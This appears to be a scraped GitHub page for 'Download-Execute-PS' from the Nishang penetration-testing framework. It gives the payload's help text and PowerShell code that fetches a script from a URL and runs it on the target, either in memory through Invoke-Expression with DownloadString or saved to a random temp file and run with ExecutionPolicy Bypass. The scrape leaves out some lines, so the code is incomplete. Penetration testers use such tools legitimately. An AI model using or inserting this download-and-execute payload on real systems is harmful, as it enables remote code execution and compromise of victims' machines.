Skip to content
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

65 lines (52 sloc) 1.89 KB
function Download-Execute-PS
Nishang Payload which downloads and executes a powershell script.
This payload downloads a powershell script from specified URL and then executes it on the target.
Use the -nowdownload option to avoid saving the script on the target. Otherwise, the script is saved with a random filename.
The URL from where the powershell script would be downloaded.
.PARAMETER Arguments
The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.
This is to be used when the scripts load a function in memory, true for most scripts in Nishang.
.PARAMETER Nodownload
If this switch is used, the script is not dowloaded to the disk.
PS > Download-Execute-PS
PS > Download-Execute-PS -Argument evilscript -nodownload
The above command does not download the script file to disk and executes the evilscript function inside the evilscript.ps1
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[Parameter(Position = 1, Mandatory = $False)]
if ($nodownload -eq $true)
Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
Invoke-Expression $Arguments
$rand = Get-Random
$webclient = New-Object System.Net.WebClient
$file1 = "$env:temp\$rand.ps1"
$script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
Invoke-Expression $pastevalue
You can’t perform that action at this time.